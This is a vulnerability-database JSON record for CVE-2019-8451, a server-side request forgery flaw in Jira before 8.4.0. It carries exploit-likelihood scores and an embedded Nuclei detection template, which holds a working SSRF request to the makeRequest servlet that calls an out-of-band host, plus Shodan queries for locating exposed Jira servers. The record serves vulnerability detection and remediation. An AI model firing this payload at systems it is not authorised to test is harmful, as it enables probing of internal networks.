{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2019-8451/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2019-8451/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2019-8451/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2019-8451/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2019-8451/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2019-8451"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2019-8451"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.94453,
      "kev": false,
      "percentile": 0.9985
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2019/CVE-2019-8451.yaml",
      "nuclei_template_severity": "medium",
      "nuclei_template_yaml": "id: CVE-2019-8451\n\ninfo:\n  name: Jira <8.4.0 - Server-Side Request Forgery\n  author: TechbrunchFR\n  severity: medium\n  description: Jira before 8.4.0 is susceptible to server-side request forgery. The /plugins/servlet/gadgets/makeRequest resource contains a logic bug in the JiraWhitelist class, which can allow an attacker to access the content of internal network resources and thus modify data, and/or execute unauthorized operations.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.\n  remediation: |\n    Upgrade Jira to version 8.4.0 or later to mitigate the SSRF vulnerability.\n  reference:\n    - https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in\n    - https://jira.atlassian.com/browse/JRASERVER-69793\n    - https://hackerone.com/reports/713900\n    - https://nvd.nist.gov/vuln/detail/CVE-2019-8451\n    - https://github.com/merlinepedra/nuclei-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N\n    cvss-score: 6.5\n    cve-id: CVE-2019-8451\n    cwe-id: CWE-918\n    epss-score: 0.94453\n    epss-percentile: 0.99851\n    cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: atlassian\n    product: jira_server\n    shodan-query:\n      - http.component:\"Atlassian Jira\"\n      - http.component:\"atlassian jira\"\n  tags: cve,cve2019,atlassian,jira,ssrf,oast,tenable,hackerone,vkev,vuln\n\nhttp:\n  - method: POST\n    path:\n      - '{{BaseURL}}/plugins/servlet/gadgets/makeRequest'\n\n    body: |\n      url=https://{{Host}}:443@{{interactsh-url}}\n\n    headers:\n      X-Atlassian-Token: no-check\n      Content-Type: application/x-www-form-urlencoded\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\" # Confirms the HTTP Interaction\n# digest: 4b0a00483046022100d9807a99016aaa6c6463039e9426a510d343ce54d49a9125a9e2db789b683104022100ee6e82961243ddf75b099b0d0ca6400518f75b7f3818a0355761fc0ba414877d:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2019-8451"
}